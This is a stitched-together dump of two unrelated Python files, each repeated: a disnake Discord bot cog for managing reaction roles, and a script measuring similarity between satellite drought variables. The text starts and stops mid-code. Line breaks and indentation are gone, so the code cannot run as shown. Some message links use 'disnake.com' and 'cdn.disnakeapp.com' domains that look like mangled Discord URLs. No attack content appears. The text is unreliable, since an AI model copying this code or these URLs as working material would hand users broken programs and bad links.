emoji: Union[disnake.Emoji, str] = None ): if {message_id, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "and emoji both to remove a reaction role" ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}removerr " f"<messageid> <emoji>`" ) ) ) if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if type(message_id) == str: return await ctx.send( embed=disnake.Embed( description="Message ID needs to be numerical", color=var.C_ORANGE ) ) guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) def rr_exists(): for i in guild_doc["reaction_roles"]: if ( i.get("messageid") == message_id and i.get("emoji") == str(emoji) ): return True if rr_exists(): def get_pair(lst): for rr_pairs in lst: if ( message_id == rr_pairs.get("messageid") and str(emoji) == rr_pairs.get("emoji") ): return rr_pairs rr_list = guild_doc["reaction_roles"] new_list = rr_list.copy() pair = get_pair(new_list) new_list.remove(pair) new_data = { "$set": { "reaction_roles": new_list } } role = ctx.guild.get_role(pair["roleid"]) await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title="Reaction role removed", description=( f"Reaction role for {role} using {emoji} " f"on message with ID {message_id} has been removed" ), color=var.C_GREEN ) ) else: await ctx.send("This reaction role does not exist") @commands.command(name="allrr", aliases=['rrall']) @has_command_permission() async def all_rr(self, ctx): guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None and guild_doc["reaction_roles"] != []: rr_amount = len(guild_doc.get("reaction_roles")) if rr_amount <= 10: exact_pages = 1 else: exact_pages = rr_amount / 10 all_pages = round(exact_pages) embed = disnake.Embed( title="All active reaction roles", color=var.C_MAIN ) rr_count = 0 for i in guild_doc["reaction_roles"]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name="** **", value=( f"{emoji} for {role.mention if role else "deleted role"} " f"in message ID `{message_id}`" ), inline=False ) if rr_count == 10: break embed.set_footer(text=f"Page 1/{all_pages}") bot_msg = await ctx.send(embed=embed) await bot_msg.add_reaction("◀️") await bot_msg.add_reaction("⬅️") await bot_msg.add_reaction("➡️") await bot_msg.add_reaction("▶️") async def reaction_roles_pagination(current_page, embed): page_rn = current_page + 1 embed.set_footer(text=f"Page {page_rn}/{all_pages}") embed.clear_fields() rr_count = current_page * 10 rr_amount = current_page * 10 for i in guild_doc["reaction_roles"][rr_amount:]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name=f"** **", value=( f"{emoji} for {role.mention if role else "deleted role"}\n" f"MessageID: `{message_id}`" ), inline=False ) if rr_count == (current_page) * 10 + 10: break def reaction_check(r, u): if ( str(r.emoji) == "◀️" or str(r.emoji) == "⬅️" or str(r.emoji) == "➡️" or str(r.emoji) == "▶️" ): return u == ctx.author and r.message == bot_msg current_page = 0 while True: reaction, user = await self.bot.wait_for("reaction_add", check=reaction_check) if str(reaction.emoji) == "◀️": try: await bot_msg.remove_reaction("◀️", ctx.author) except disnake.Forbidden: pass current_page = 0 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "➡️": try: await bot_msg.remove_reaction("➡️", ctx.author) except disnake.Forbidden: pass current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "⬅️": try: await bot_msg.remove_reaction("⬅️", ctx.author) except disnake.Forbidden: pass current_page -= 1 if current_page < 0: current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "▶️": try: await bot_msg.remove_reaction("▶️", ctx.author) except disnake.Forbidden: pass current_page = all_pages - 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) else: await ctx.send( "This server does not have any active reaction roles right now" ) @commands.command(name="uniquerr") @has_command_permission() async def unique_rr(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids: new_list = unique_list.copy() new_list.append(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully marked the message " "with unique reactions" ), description=( "Now users can only react to one emoji and " "take one role in [this message]" f"(https://disnake.com/channels/{ctx.guild.id}" f"/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id " "you entered does not have any reaction role." ) else: await ctx.send( "Cannot mark that message with unique reactions " "since this server does not have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "in order to mark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.command(name="removeunique") @has_command_permission() async def remove_unique(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids and msg.id in unique_list: new_list = unique_list.copy() new_list.remove(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully unmarked the " "message with unique reactions" ), description=( "Now users can react and take multiple roles " "in [this message](https://disnake.com/channels" f"/{ctx.guild.id}/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id you entered does" " not have any reaction role so can't remove the unique" " mark either." ) else: await ctx.send( "Cannot remove the unique mark from that message since you" " don't have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message in order " "to unmark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.Cog.listener() async def on_raw_reaction_add(self, payload): # Listeners don't care about cog checks so need to add a check manually guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") guild = self.bot.get_guild(payload.guild_id) assign_role = guild.get_role(role_id) if not payload.member.bot: await payload.member.add_roles(assign_role) if ( guild_doc is not None and payload.message_id in guild_doc["unique_messages"] ): channel = self.bot.get_channel(payload.channel_id) message = await channel.fetch_message(payload.message_id) for r in message.reactions: if ( payload.member in await r.users().flatten() and not payload.member.bot and str(r) != str(payload.emoji) ): await message.remove_reaction(r.emoji, payload.member) @commands.Cog.listener() # Listeners don't care about cog checks so need to add a check manually async def on_raw_reaction_remove(self, payload): guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") member = ( self.bot.get_guild(payload.guild_id) .get_member(payload.user_id) ) if member is not None: guild = self.bot.get_guild(payload.guild_id) remove_role = guild.get_role(role_id) await member.remove_roles(remove_role) def setup(bot): bot.add_cog(ReactionRoles(bot))
import disnake from typing import Union from disnake.ext import commands import database as db import constants as var from functions import get_prefix from ext.permissions import has_command_permission class ReactionRoles(commands.Cog): def __init__(self, bot): self.bot = bot async def cog_check(self, ctx): """Simple check to see if this cog (plugin) is enabled.""" guild_doc = await db.PLUGINS.find_one({"_id": ctx.guild.id}) if guild_doc.get("ReactionRoles"): return True else: await ctx.send( embed=disnake.Embed( description=( f"{var.E_DISABLE} The Reaction Roles plugin" " is disabled in this server" ), color=var.C_ORANGE ) ) @commands.command() @has_command_permission() async def rr( self, ctx, channel: disnake.TextChannel = None, message_id: Union[int, None] = None, role: disnake.Role = None, emoji: Union[disnake.Emoji, str] = None ): if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if {channel, message_id, role, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the channel, message, " "role and emoji all three to add a reaction role," " make sure the IDs are numerical." ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}rr" " <#channel> <messageid> <role> <emoji>`" ) ).set_footer( text=( "You can use either role ID or mention it (use ID if " "you don't want to disturb everyone having the role)" ) ) ) bot_member = ctx.guild.get_member(self.bot.user.id) try: bot_role = bot_member.roles[1] except IndexError: bot_role = bot_member.roles[0] try: msg = channel.get_partial_message(message_id) except Exception: raise commands.MessageNotFound(ctx) if bot_role.position >= role.position: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is None: await db.REACTION_ROLES.insert_one( { "_id": ctx.guild.id, "reaction_roles": [{ "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) }], "unique_messages": [] } ) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: guildrr_list = guild_doc["reaction_roles"] def check(): for i in guildrr_list: if i.get("messageid") == msg.id and i.get( "emoji") == str(emoji): return True if check(): await ctx.send( "You have already setup this reaction role" f" using {emoji} on that message :D " "I can see it in the database!" ) else: new_list = guildrr_list.copy() new_list.append( { "messageid": msg.id, "roleid": role.id, "emoji": str(emoji) } ) new_data = { "$set": { "reaction_roles": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await msg.add_reaction(emoji) await ctx.send( f"Reaction role for {role} using {emoji} setted up!" f" https://disnake.com/channels/{ctx.message.guild.id}" f"/{msg.channel.id}/{msg.id}" ) else: await ctx.send( embed=disnake.Embed( title="Role position error", description=( f"The role {role.mention} is above my role " f"({bot_role.mention}), in order for me to update any " f"role (reaction roles) my role needs to be above that " f"role, just move my role above your reaction role as " f"shown below\n\n **Server Settings > Roles > Click on" f" the {bot_role.mention} Role > Drag it above the " f"{role.mention} Role **(Shown as the Developer role in" f" the image below)" ), color=var.C_RED ).set_image( url=( "https://cdn.disnakeapp.com/attachments/" "843519647055609856/850711272726986802/unknown.png" ) ) ) @commands.command(name="removerr") @has_command_permission() async def remove_rr( self, ctx, message_id: Union[int, str] = None, emoji: Union[disnake.Emoji, str] = None ): if {message_id, emoji} == {None}: return await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "and emoji both to remove a reaction role" ), color=var.C_RED ).add_field( name="Format", value=( f"`{await get_prefix(ctx)}removerr " f"<messageid> <emoji>`" ) ) ) if type(emoji) == str and emoji.startswith("<"): raise commands.EmojiNotFound(ctx) if type(message_id) == str: return await ctx.send( embed=disnake.Embed( description="Message ID needs to be numerical", color=var.C_ORANGE ) ) guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) def rr_exists(): for i in guild_doc["reaction_roles"]: if ( i.get("messageid") == message_id and i.get("emoji") == str(emoji) ): return True if rr_exists(): def get_pair(lst): for rr_pairs in lst: if ( message_id == rr_pairs.get("messageid") and str(emoji) == rr_pairs.get("emoji") ): return rr_pairs rr_list = guild_doc["reaction_roles"] new_list = rr_list.copy() pair = get_pair(new_list) new_list.remove(pair) new_data = { "$set": { "reaction_roles": new_list } } role = ctx.guild.get_role(pair["roleid"]) await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title="Reaction role removed", description=( f"Reaction role for {role} using {emoji} " f"on message with ID {message_id} has been removed" ), color=var.C_GREEN ) ) else: await ctx.send("This reaction role does not exist") @commands.command(name="allrr", aliases=['rrall']) @has_command_permission() async def all_rr(self, ctx): guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None and guild_doc["reaction_roles"] != []: rr_amount = len(guild_doc.get("reaction_roles")) if rr_amount <= 10: exact_pages = 1 else: exact_pages = rr_amount / 10 all_pages = round(exact_pages) embed = disnake.Embed( title="All active reaction roles", color=var.C_MAIN ) rr_count = 0 for i in guild_doc["reaction_roles"]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name="** **", value=( f"{emoji} for {role.mention if role else 'deleted role'} " f"in message ID `{message_id}`" ), inline=False ) if rr_count == 10: break embed.set_footer(text=f"Page 1/{all_pages}") bot_msg = await ctx.send(embed=embed) await bot_msg.add_reaction("◀️") await bot_msg.add_reaction("⬅️") await bot_msg.add_reaction("➡️") await bot_msg.add_reaction("▶️") async def reaction_roles_pagination(current_page, embed): page_rn = current_page + 1 embed.set_footer(text=f"Page {page_rn}/{all_pages}") embed.clear_fields() rr_count = current_page * 10 rr_amount = current_page * 10 for i in guild_doc["reaction_roles"][rr_amount:]: rr_count += 1 message_id = i.get("messageid") role = ctx.guild.get_role(i.get("roleid")) emoji = i.get("emoji") embed.add_field( name=f"** **", value=( f"{emoji} for {role.mention if role else 'deleted role'}\n" f"MessageID: `{message_id}`" ), inline=False ) if rr_count == (current_page) * 10 + 10: break def reaction_check(r, u): if ( str(r.emoji) == "◀️" or str(r.emoji) == "⬅️" or str(r.emoji) == "➡️" or str(r.emoji) == "▶️" ): return u == ctx.author and r.message == bot_msg current_page = 0 while True: reaction, user = await self.bot.wait_for("reaction_add", check=reaction_check) if str(reaction.emoji) == "◀️": try: await bot_msg.remove_reaction("◀️", ctx.author) except disnake.Forbidden: pass current_page = 0 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "➡️": try: await bot_msg.remove_reaction("➡️", ctx.author) except disnake.Forbidden: pass current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "⬅️": try: await bot_msg.remove_reaction("⬅️", ctx.author) except disnake.Forbidden: pass current_page -= 1 if current_page < 0: current_page += 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) if str(reaction.emoji) == "▶️": try: await bot_msg.remove_reaction("▶️", ctx.author) except disnake.Forbidden: pass current_page = all_pages - 1 await reaction_roles_pagination(current_page, embed) await bot_msg.edit(embed=embed) else: await ctx.send( "This server does not have any active reaction roles right now" ) @commands.command(name="uniquerr") @has_command_permission() async def unique_rr(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids: new_list = unique_list.copy() new_list.append(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully marked the message " "with unique reactions" ), description=( "Now users can only react to one emoji and " "take one role in [this message]" f"(https://disnake.com/channels/{ctx.guild.id}" f"/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id " "you entered does not have any reaction role." ) else: await ctx.send( "Cannot mark that message with unique reactions " "since this server does not have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message " "in order to mark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.command(name="removeunique") @has_command_permission() async def remove_unique(self, ctx, msg: disnake.Message = None): if msg is not None: guild_doc = await db.REACTION_ROLES.find_one({"_id": ctx.guild.id}) if guild_doc is not None: unique_list = guild_doc["unique_messages"] all_msg_ids = [i.get("messageid") for i in guild_doc["reaction_roles"]] if msg.id in all_msg_ids and msg.id in unique_list: new_list = unique_list.copy() new_list.remove(msg.id) new_data = { "$set": { "unique_messages": new_list } } await db.REACTION_ROLES.update_one(guild_doc, new_data) await ctx.send( embed=disnake.Embed( title=( "Successfully unmarked the " "message with unique reactions" ), description=( "Now users can react and take multiple roles " "in [this message](https://disnake.com/channels" f"/{ctx.guild.id}/{msg.channel.id}/{msg.id})" ), color=var.C_GREEN ) ) else: await ctx.send( "Hmm it looks like that the message id you entered does" " not have any reaction role so can't remove the unique" " mark either." ) else: await ctx.send( "Cannot remove the unique mark from that message since you" " don't have any reaction roles yet :(" ) else: await ctx.send( embed=disnake.Embed( description=( "🚫 You need to define the message in order " "to unmark it with unique reactions" ), color=var.C_RED ).add_field( name="Format", value=f"`{await get_prefix(ctx)}uniquerr <messageid>`" ) ) @commands.Cog.listener() async def on_raw_reaction_add(self, payload): # Listeners don't care about cog checks so need to add a check manually guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") guild = self.bot.get_guild(payload.guild_id) assign_role = guild.get_role(role_id) if not payload.member.bot: await payload.member.add_roles(assign_role) if ( guild_doc is not None and payload.message_id in guild_doc["unique_messages"] ): channel = self.bot.get_channel(payload.channel_id) message = await channel.fetch_message(payload.message_id) for r in message.reactions: if ( payload.member in await r.users().flatten() and not payload.member.bot and str(r) != str(payload.emoji) ): await message.remove_reaction(r.emoji, payload.member) @commands.Cog.listener() # Listeners don't care about cog checks so need to add a check manually async def on_raw_reaction_remove(self, payload): guild_doc = await db.REACTION_ROLES.find_one({"_id": payload.guild_id}) if guild_doc is not None and guild_doc["reaction_roles"] is not None: for i in guild_doc["reaction_roles"]: if ( payload.message_id == i.get("messageid") and str(payload.emoji) == i.get("emoji") ): role_id = i.get("roleid") member = ( self.bot.get_guild(payload.guild_id) .get_member(payload.user_id) ) if member is not None: guild = self.bot.get_guild(payload.guild_id) remove_role = guild.get_role(role_id) await member.remove_roles(remove_role) def setup(bot): bot.add_cog(ReactionRoles(bot))
import sys, os from pyprojroot import here import logging import pathlib logging.basicConfig(stream=sys.stdout, level=logging.INFO) logger = logging.getLogger() PATH = pathlib.Path(str(here())) # root = here(project_files=[".here"]) sys.path.append(str(here())) import argparse import numpy as np # drought tools from src.data.drought.loader import DataLoader from src.features.drought.build_features import ( get_cali_geometry, mask_datacube, remove_climatology, get_density_cubes, get_common_elements_many, ) import pandas as pd from sklearn.preprocessing import StandardScaler from src.models.train_models import get_similarity_scores from src.models.similarity import univariate_stats from tqdm import tqdm from src.features.utils import subset_indices from scipy import stats from src.experiments.utils import dict_product import itertools RES_PATH = PATH.joinpath("data/drought/results/compare") def main(args): # get save name SAVE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi.csv" ) SMOKE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi_sm.csv" ) # Load data logger.info("Loading datacube...") drought_cube = DataLoader().load_data(args.region, args.sampling) # get cali geometry logger.info("Getting shapefile...") if args.region in ["conus"]: shape_file = get_cali_geometry() else: raise ValueError("Unrecognized region.") # subset datacube with cali logger.info(f"Masking dataset with {args.region} shapefile.") drought_cube = mask_datacube(drought_cube, shape_file) # do interpolation logger.info(f"Interpolating time dims with {args.interp_method} method") drought_cube = drought_cube.interpolate_na(dim="time", method=args.interp_method) # Remove climatology logger.info(f"Removing climatology") drought_cube, _ = remove_climatology(drought_cube) # drought_years drought_years = { "2010": False, "2011": False, "2012": True, "2013": False, "2014": True, "2015": True, } # # MI elements # variables_names = ["VOD", "NDVI", "LST", "SM"] # ======================== # Experimental Parameters # ======================== parameters = {} parameters["cubes"] = list(drought_cube.groupby("time.year")) parameters["temporal"] = np.arange(1, args.temporal + 1) parameters["spatial"] = np.arange(1, args.spatial + 1) parameters = list(dict_product(parameters)) results_df_single = pd.DataFrame() if args.smoke_test: iparams = parameters[0] # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations res = set( tuple( frozenset(sub) for sub in set( list(itertools.permutations(variables.keys(), args.compare)) ) ) ) var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"],], axis=1, ) # print(var_set1.shape, var_set2.shape) # Univariate statistics (pearson, spearman, kendall's tau) # uni_stats = univariate_stats(X_norm, Y_norm) logger.info(f"Subsetting data") idx = subset_indices(var_set1, subsample=1_000) # standardize data logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.iloc[idx, :]) Y_norm = StandardScaler().fit_transform(var_set2.iloc[idx, :]) logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, total correlation logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=1) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SMOKE_NAME) else: with tqdm(parameters) as params: for iparams in params: # Update progress bar postfix = dict( Year=f"{iparams["cubes"][0]}", Temporal=f"{iparams["temporal"]}", Spatial=f"{iparams["spatial"]}", ) params.set_postfix(postfix) # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [ variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"], ], axis=1, ) # print(var_set1.shape, var_set2.shape) # logger.info(f"Subsetting data") if args.subsample < var_set1.values.shape[0]: idx = subset_indices(var_set1.values, subsample=args.subsample) var_set1 = var_set1.iloc[idx, :] var_set2 = var_set2.iloc[idx, :] # standardize data # logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.values) Y_norm = StandardScaler().fit_transform(var_set2.values) # logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, total correlation # logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=0) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SAVE_NAME) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Arguments for Drought Experiment.") # DataCube Arguments parser.add_argument( "--region", default="conus", type=str, help="The region for the drought events." ) parser.add_argument( "--sampling", default="14D", type=str, help="The sampling scheme for drought events.", ) # PreProcessing Arguments parser.add_argument( "--interp_method", default="linear", type=str, help="Interpolation method." ) # Climatology Arguments parser.add_argument( "--climatology_window", default=2, type=int, help="Window length for climatology.", ) parser.add_argument( "--subsample", type=int, default=10_000, help="subset points to take" ) parser.add_argument( "-c", "--compare", type=int, default=2, help="variables to compare" ) parser.add_argument( "-t", "--temporal", type=int, default=12, help="Max number of temporal dimensions", ) parser.add_argument( "-s", "--spatial", type=int, default=1, help="Max number of spatial dimensions" ) # logistics parser.add_argument( "--save", default="drought_v0", type=str, help="Save Name for data results.", ) parser.add_argument("-sm", "--smoke_test", action="store_true") main(parser.parse_args())
import sys, os from pyprojroot import here import logging import pathlib logging.basicConfig(stream=sys.stdout, level=logging.INFO) logger = logging.getLogger() PATH = pathlib.Path(str(here())) # root = here(project_files=[".here"]) sys.path.append(str(here())) import argparse import numpy as np # drought tools from src.data.drought.loader import DataLoader from src.features.drought.build_features import ( get_cali_geometry, mask_datacube, remove_climatology, get_density_cubes, get_common_elements_many, ) import pandas as pd from sklearn.preprocessing import StandardScaler from src.models.train_models import get_similarity_scores from src.models.similarity import univariate_stats from tqdm import tqdm from src.features.utils import subset_indices from scipy import stats from src.experiments.utils import dict_product import itertools RES_PATH = PATH.joinpath("data/drought/results/compare") def main(args): # get save name SAVE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi.csv" ) SMOKE_NAME = RES_PATH.joinpath( args.save + f"_t{args.temporal}_s{args.spatial}_c{args.compare}_smadi_sm.csv" ) # Load data logger.info("Loading datacube...") drought_cube = DataLoader().load_data(args.region, args.sampling) # get cali geometry logger.info("Getting shapefile...") if args.region in ["conus"]: shape_file = get_cali_geometry() else: raise ValueError("Unrecognized region.") # subset datacube with cali logger.info(f"Masking dataset with {args.region} shapefile.") drought_cube = mask_datacube(drought_cube, shape_file) # do interpolation logger.info(f"Interpolating time dims with {args.interp_method} method") drought_cube = drought_cube.interpolate_na(dim="time", method=args.interp_method) # Remove climatology logger.info(f"Removing climatology") drought_cube, _ = remove_climatology(drought_cube) # drought_years drought_years = { "2010": False, "2011": False, "2012": True, "2013": False, "2014": True, "2015": True, } # # MI elements # variables_names = ["VOD", "NDVI", "LST", "SM"] # ======================== # Experimental Parameters # ======================== parameters = {} parameters["cubes"] = list(drought_cube.groupby("time.year")) parameters["temporal"] = np.arange(1, args.temporal + 1) parameters["spatial"] = np.arange(1, args.spatial + 1) parameters = list(dict_product(parameters)) results_df_single = pd.DataFrame() if args.smoke_test: iparams = parameters[0] # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations res = set( tuple( frozenset(sub) for sub in set( list(itertools.permutations(variables.keys(), args.compare)) ) ) ) var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"],], axis=1, ) # print(var_set1.shape, var_set2.shape) # Univariate statistics (pearson, spearman, kendall's tau) # uni_stats = univariate_stats(X_norm, Y_norm) logger.info(f"Subsetting data") idx = subset_indices(var_set1, subsample=1_000) # standardize data logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.iloc[idx, :]) Y_norm = StandardScaler().fit_transform(var_set2.iloc[idx, :]) logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, total correlation logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=1) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SMOKE_NAME) else: with tqdm(parameters) as params: for iparams in params: # Update progress bar postfix = dict( Year=f"{iparams['cubes'][0]}", Temporal=f"{iparams['temporal']}", Spatial=f"{iparams['spatial']}", ) params.set_postfix(postfix) # extract density cubes vod_df, lst_df, ndvi_df, sm_df = get_density_cubes( iparams["cubes"][1], iparams["spatial"], iparams["temporal"] ) # get common elements dfs = get_common_elements_many([vod_df, lst_df, ndvi_df, sm_df]) variables = {"VOD": dfs[0], "NDVI": dfs[1], "SM": dfs[2], "LST": dfs[3]} # get unique permutations var_set1 = pd.concat( [variables["NDVI"], variables["SM"], variables["LST"]], axis=1 ) var_set2 = pd.concat( [ variables["NDVI"], variables["SM"], variables["LST"], variables["VOD"], ], axis=1, ) # print(var_set1.shape, var_set2.shape) # logger.info(f"Subsetting data") if args.subsample < var_set1.values.shape[0]: idx = subset_indices(var_set1.values, subsample=args.subsample) var_set1 = var_set1.iloc[idx, :] var_set2 = var_set2.iloc[idx, :] # standardize data # logger.info(f"Standardizing Data...") X_norm = StandardScaler().fit_transform(var_set1.values) Y_norm = StandardScaler().fit_transform(var_set2.values) # logger.info(f"Data inputs: {X_norm.shape},{Y_norm.shape}") # entropy, total correlation # logger.info(f"Getting similarity scores...") multivar_stats = get_similarity_scores(X_norm, Y_norm, verbose=0) # get H and TC results_df_single = results_df_single.append( { "year": iparams["cubes"][0], "drought": drought_years[str(iparams["cubes"][0])], "samples": X_norm.shape[0], "temporal": iparams["temporal"], "variable1": "SMADI", "variable2": "SMADI+", **multivar_stats, }, ignore_index=True, ) results_df_single.to_csv(SAVE_NAME) if __name__ == "__main__": parser = argparse.ArgumentParser(description="Arguments for Drought Experiment.") # DataCube Arguments parser.add_argument( "--region", default="conus", type=str, help="The region for the drought events." ) parser.add_argument( "--sampling", default="14D", type=str, help="The sampling scheme for drought events.", ) # PreProcessing Arguments parser.add_argument( "--interp_method", default="linear", type=str, help="Interpolation method." ) # Climatology Arguments parser.add_argument( "--climatology_window", default=2, type=int, help="Window length for climatology.", ) parser.add_argument( "--subsample", type=int, default=10_000, help="subset points to take" ) parser.add_argument( "-c", "--compare", type=int, default=2, help="variables to compare" ) parser.add_argument( "-t", "--temporal", type=int, default=12, help="Max number of temporal dimensions", ) parser.add_argument( "-s", "--spatial", type=int, default=1, help="Max number of spatial dimensions" ) # logistics parser.add_argument( "--save", default="drought_v0", type=str, help="Save 